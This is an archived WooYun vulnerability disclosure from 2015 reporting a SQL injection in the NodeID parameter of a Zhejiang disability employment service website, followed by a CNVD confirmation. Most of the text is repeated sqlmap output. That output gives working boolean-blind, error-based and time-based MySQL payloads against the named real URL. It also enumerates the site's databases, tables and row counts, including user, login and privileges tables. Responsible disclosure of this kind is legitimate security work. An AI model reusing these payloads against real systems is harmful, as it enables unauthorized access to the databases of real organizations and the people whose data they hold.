乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-05-18: 细节已通知厂商并且等待厂商处理中 2015-05-22: 厂商已经确认,细节仅向厂商公开 2015-06-01: 细节向核心白帽子及相关领域专家公开 2015-06-11: 细节向普通白帽子公开 2015-06-21: 细节向实习白帽子公开 2015-07-06: 细节向公众公开
RT
主办:浙江省残疾人劳动就业服务中心存在GET注射http://jyxx.zjdpf.org.cn/publish/index.php?NodeID=10&SiteID=4&page=1
sqlmap identified the following injection points with a total of 235 HTTP(s) requests:---Parameter: NodeID (GET) Type: boolean-based blind Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE) Payload: NodeID=10 RLIKE (SELECT (CASE WHEN (1854=1854) THEN 10 ELSE 0x28 END))&SiteID=4&page=1 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: NodeID=10 AND (SELECT 4690 FROM(SELECT COUNT(*),CONCAT(0x7162716271,(SELECT (CASE WHEN (4690=4690) THEN 1 ELSE 0 END)),0x716b767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&SiteID=4&page=1 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: NodeID=10 AND SLEEP(5)&SiteID=4&page=1---web server operating system: Windowsweb application technology: Apache 2.2.3, PHP 5.2.1back-end DBMS: MySQL 5.0sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: NodeID (GET) Type: boolean-based blind Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE) Payload: NodeID=10 RLIKE (SELECT (CASE WHEN (1854=1854) THEN 10 ELSE 0x28 END))&SiteID=4&page=1 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: NodeID=10 AND (SELECT 4690 FROM(SELECT COUNT(*),CONCAT(0x7162716271,(SELECT (CASE WHEN (4690=4690) THEN 1 ELSE 0 END)),0x716b767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&SiteID=4&page=1 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: NodeID=10 AND SLEEP(5)&SiteID=4&page=1---web server operating system: Windowsweb application technology: Apache 2.2.3, PHP 5.2.1back-end DBMS: MySQL 5.0available databases [6]:[*] db_art[*] db_cljyxxw[*] db_cltgpt[*] information_schema[*] mysql[*] temp_tempsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: NodeID (GET) Type: boolean-based blind Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE) Payload: NodeID=10 RLIKE (SELECT (CASE WHEN (1854=1854) THEN 10 ELSE 0x28 END))&SiteID=4&page=1 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: NodeID=10 AND (SELECT 4690 FROM(SELECT COUNT(*),CONCAT(0x7162716271,(SELECT (CASE WHEN (4690=4690) THEN 1 ELSE 0 END)),0x716b767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&SiteID=4&page=1 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: NodeID=10 AND SLEEP(5)&SiteID=4&page=1---web server operating system: Windowsweb application technology: Apache 2.2.3, PHP 5.2.1back-end DBMS: MySQL 5.0Database: db_cljyxxw[11 tables]+--------------------------+| ecms_content_article || ecms_content_info || ecms_content_law || ecms_content_zpxx || ecms_files || ecms_nodes || ecms_template_node || ecms_visited_stat || webinformation || webinformationfile || webinformationtype |+--------------------------+Database: db_art[37 tables]+--------------------------+| privileges || user || ecms_content_article || ecms_content_artshow || ecms_content_fields || ecms_content_info || ecms_content_law || ecms_content_tables || ecms_content_zpxx || ecms_extra_menu || ecms_files || ecms_interactive_letter || ecms_interactive_priv || ecms_interactive_setting || ecms_interactive_type || ecms_node_priv || ecms_nodes || ecms_serial || ecms_setup || ecms_site_priv || ecms_sites || ecms_template_node || ecms_visited_stat || ecms_vote_limit || ecms_vote_message || ecms_vote_option || ecms_vote_priv || ecms_vote_question || ecms_vote_subject || ecms_vote_type || log || login || map_priv || organ || role || user_organ || user_role |+--------------------------+Database: db_cltgpt[29 tables]+--------------------------+| privileges || user || ecms_content_article || ecms_content_fields || ecms_content_info || ecms_content_law || ecms_content_tables || ecms_extra_menu || ecms_files || ecms_node_priv || ecms_nodes || ecms_serial || ecms_setup || ecms_site_priv || ecms_sites || ecms_template_node || log || login || map_priv || news_info || organ || role || tg_article || tg_class || tg_image || tg_process || tg_suggestion || user_organ || user_role |+--------------------------+sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: NodeID (GET) Type: boolean-based blind Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE) Payload: NodeID=10 RLIKE (SELECT (CASE WHEN (1854=1854) THEN 10 ELSE 0x28 END))&SiteID=4&page=1 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: NodeID=10 AND (SELECT 4690 FROM(SELECT COUNT(*),CONCAT(0x7162716271,(SELECT (CASE WHEN (4690=4690) THEN 1 ELSE 0 END)),0x716b767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&SiteID=4&page=1 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: NodeID=10 AND SLEEP(5)&SiteID=4&page=1---web server operating system: Windowsweb application technology: Apache 2.2.3, PHP 5.2.1back-end DBMS: MySQL 5.0Database: db_cljyxxw[11 tables]+--------------------------+| ecms_content_article || ecms_content_info || ecms_content_law || ecms_content_zpxx || ecms_files || ecms_nodes || ecms_template_node || ecms_visited_stat || webinformation || webinformationfile || webinformationtype |+--------------------------+Database: db_art[37 tables]+--------------------------+| privileges || user || ecms_content_article || ecms_content_artshow || ecms_content_fields || ecms_content_info || ecms_content_law || ecms_content_tables || ecms_content_zpxx || ecms_extra_menu || ecms_files || ecms_interactive_letter || ecms_interactive_priv || ecms_interactive_setting || ecms_interactive_type || ecms_node_priv || ecms_nodes || ecms_serial || ecms_setup || ecms_site_priv || ecms_sites || ecms_template_node || ecms_visited_stat || ecms_vote_limit || ecms_vote_message || ecms_vote_option || ecms_vote_priv || ecms_vote_question || ecms_vote_subject || ecms_vote_type || log || login || map_priv || organ || role || user_organ || user_role |+--------------------------+Database: db_cltgpt[29 tables]+--------------------------+| privileges || user || ecms_content_article || ecms_content_fields || ecms_content_info || ecms_content_law || ecms_content_tables || ecms_extra_menu || ecms_files || ecms_node_priv || ecms_nodes || ecms_serial || ecms_setup || ecms_site_priv || ecms_sites || ecms_template_node || log || login || map_priv || news_info || organ || role || tg_article || tg_class || tg_image || tg_process || tg_suggestion || user_organ || user_role |+--------------------------+Database: db_cljyxxw+--------------------------+---------+| Table | Entries |+--------------------------+---------+| ecms_content_article | 321 || ecms_content_info | 321 || ecms_visited_stat | 53 || ecms_nodes | 50 || ecms_template_node | 30 || ecms_files | 29 |+--------------------------+---------+Database: db_art+--------------------------+---------+| Table | Entries |+--------------------------+---------+| ecms_visited_stat | 5161 || ecms_node_priv | 1001 || ecms_content_info | 252 || ecms_content_article | 217 || ecms_interactive_letter | 65 || ecms_template_node | 44 || ecms_nodes | 43 || ecms_content_artshow | 35 || ecms_site_priv | 33 || `privileges` | 31 || ecms_content_fields | 27 || map_priv | 24 || ecms_interactive_priv | 22 || ecms_vote_priv | 10 || `user` | 5 || ecms_files | 5 || user_organ | 5 || user_role | 5 || ecms_content_tables | 4 || ecms_extra_menu | 2 || ecms_interactive_type | 2 || ecms_sites | 2 || ecms_vote_option | 2 || organ | 2 || role | 2 || ecms_interactive_setting | 1 || ecms_vote_question | 1 || ecms_vote_subject | 1 || ecms_vote_type | 1 || login | 1 |+--------------------------+---------+Database: db_cltgpt+--------------------------+---------+| Table | Entries |+--------------------------+---------+| tg_article | 5589 || tg_image | 4899 || tg_process | 3991 || ecms_nodes | 152 || organ | 121 || `user` | 115 || user_organ | 114 || map_priv | 77 || tg_class | 36 || ecms_node_priv | 33 || `privileges` | 24 || ecms_content_fields | 14 || ecms_site_priv | 11 || user_role | 11 || login | 6 || ecms_content_article | 5 || ecms_content_info | 5 || ecms_template_node | 5 || role | 3 || ecms_content_tables | 2 || ecms_extra_menu | 1 || ecms_sites | 1 || news_info | 1 |+--------------------------+---------+sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: NodeID (GET) Type: boolean-based blind Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE) Payload: NodeID=10 RLIKE (SELECT (CASE WHEN (1854=1854) THEN 10 ELSE 0x28 END))&SiteID=4&page=1 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: NodeID=10 AND (SELECT 4690 FROM(SELECT COUNT(*),CONCAT(0x7162716271,(SELECT (CASE WHEN (4690=4690) THEN 1 ELSE 0 END)),0x716b767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&SiteID=4&page=1 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: NodeID=10 AND SLEEP(5)&SiteID=4&page=1---web server operating system: Windowsweb application technology: Apache 2.2.3, PHP 5.2.1back-end DBMS: MySQL 5.0
危害等级:中
漏洞Rank:10
确认时间:2015-05-22 19:09
CNVD确认并复现所述漏洞情况,已经转由CNCERT下发给浙江分中心,由其后续协调网站管理单位处置。
暂无